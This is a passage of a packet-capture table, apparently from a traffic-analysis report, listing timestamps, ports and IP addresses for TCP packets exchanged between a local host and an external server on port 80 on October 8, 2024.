Oct 8, 2024 11:32:24.777044058 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.777045965 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.777055979 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.777067900 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.777079105 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.777101040 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.777131081 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.777134895 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.777148008 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.777184010 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.777195930 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.777195930 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.777209044 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.777221918 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.777235985 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.777276993 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.784080982 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.784106970 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.784121990 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.784137964 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.784166098 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.784177065 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.784183979 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.784246922 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.784276009 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.784310102 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.784322023 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.784336090 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.784348965 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.784379959 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.784418106 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.784451962 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.784470081 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.784485102 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.784498930 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.784512997 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.784526110 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.784538031 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.784544945 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.784549952 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.784563065 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.784588099 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.784606934 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.784616947 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.784643888 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.784657001 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.784702063 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.784715891 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.784724951 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.784730911 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.784756899 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.784781933 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.784962893 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.784975052 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.784987926 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.784998894 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.785011053 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.785022020 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.785027981 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.785036087 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.785048008 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.785059929 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.785070896 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.785073996 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.785100937 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.785132885 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.785254002 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.785271883 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.785284042 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.785294056 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.785309076 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.785322905 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.785334110 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.785341024 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.785373926 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.785435915 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.785446882 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.785490036 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.785510063 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.785526037 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.785540104 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.785552979 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.785567045 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.785566092 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.785602093 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.785640001 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.785646915 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.785660982 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.785676003 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.785689116 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.785703897 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.785706997 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.785716057 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.785727978 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.785734892 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.785739899 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.785753012 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.785763979 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.785777092 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.785814047 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.789123058 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.789139032 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.789150000 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.789166927 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.789177895 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.789184093 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.789190054 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.789202929 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.789212942 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.789226055 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.789227962 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.789238930 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.789251089 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.789258957 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.789285898 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.841293097 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.864976883 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.864998102 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.865021944 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.865046024 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.865061998 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.865070105 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.865077972 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.865092039 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.865093946 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.865109921 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.865125895 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.865128994 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.865140915 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.865156889 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.865173101 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.865178108 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.865189075 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.865207911 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.865211010 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.865221024 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.865235090 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.865236044 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.865255117 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.865262985 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.865272045 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.865287066 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.865289927 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.865302086 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.865317106 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.865324974 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.865334988 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.865350008 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.865353107 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.865379095 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.865382910 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.865396976 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.865439892 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.865453959 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.865469933 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.865473986 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.865485907 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:24.865498066 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.865508080 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:24.919457912 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:25.241096020 CEST	80	50005	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:25.241182089 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:28.290728092 CEST	50005	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:31.869415998 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:32.166595936 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.166680098 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:32.166935921 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:32.171819925 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.793725014 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.793741941 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.793754101 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.793766022 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.793781996 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.793792963 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.793804884 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.793809891 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.793817043 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.793823957 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.794049025 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:32.794049025 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:32.799015045 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.799034119 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.799618959 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:32.884234905 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.884253979 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.884268045 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.884279966 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.884304047 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:32.884315014 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.884327888 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.884347916 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:32.884361982 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.884372950 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.884378910 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:32.884401083 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:32.885231018 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.885302067 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.885313034 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.885324955 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.885337114 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.885384083 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:32.886233091 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.886245966 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.886257887 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.886284113 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:32.886322021 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:32.886357069 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.886368036 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.886416912 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:32.887222052 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.887273073 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.887283087 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.887295961 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.887320995 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:32.887342930 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:32.929955959 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.929980993 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.929991961 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.930023909 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:32.974744081 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.974767923 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.974780083 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.974792957 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.974797010 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:32.974807978 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.974819899 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:32.974819899 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.974833012 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.974842072 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:32.974883080 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:32.975078106 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.975096941 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.975209951 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:32.975311041 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.975327969 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.975341082 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.975352049 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.975363970 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.975368977 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:32.975377083 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.975399971 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.975411892 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:32.975411892 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:32.976145029 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.976176023 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.976186991 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.976193905 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:32.976224899 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.976229906 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:32.976237059 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.976248980 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.976260900 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.976270914 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:32.976296902 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:32.977153063 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.977171898 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.977183104 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.977196932 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.977217913 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:32.977231979 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.977251053 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.977252007 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:32.977262974 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.977291107 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:32.978034973 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.978055954 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.978066921 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.978080988 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.978081942 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:32.978096008 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.978102922 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:32.978106976 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.978118896 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.978127956 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:32.978156090 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:32.978904963 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.978951931 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.978961945 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.978996992 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:32.979020119 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.979031086 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.979041100 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.979053020 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:32.979055882 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:32.979088068 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.021155119 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.021198034 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.021214008 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.021224022 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.021234989 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.021285057 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.065391064 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.065408945 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.065419912 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.065443993 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.065465927 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.065479994 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.065516949 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.065551996 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.065597057 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.065690994 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.065701008 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.065711975 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.065721989 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.065732956 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.065737009 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.065742016 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.065756083 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.065779924 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.066485882 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.066495895 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.066507101 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.066517115 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.066526890 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.066551924 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.066930056 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.067047119 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.067059994 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.067071915 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.067085028 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.067091942 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.067097902 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.067110062 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.067117929 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.067142010 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.067857027 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.067882061 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.067893982 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.067907095 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.067923069 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.067934036 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.067935944 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.067945004 CEST	80	50007	63.250.38.167	192.168.2.6
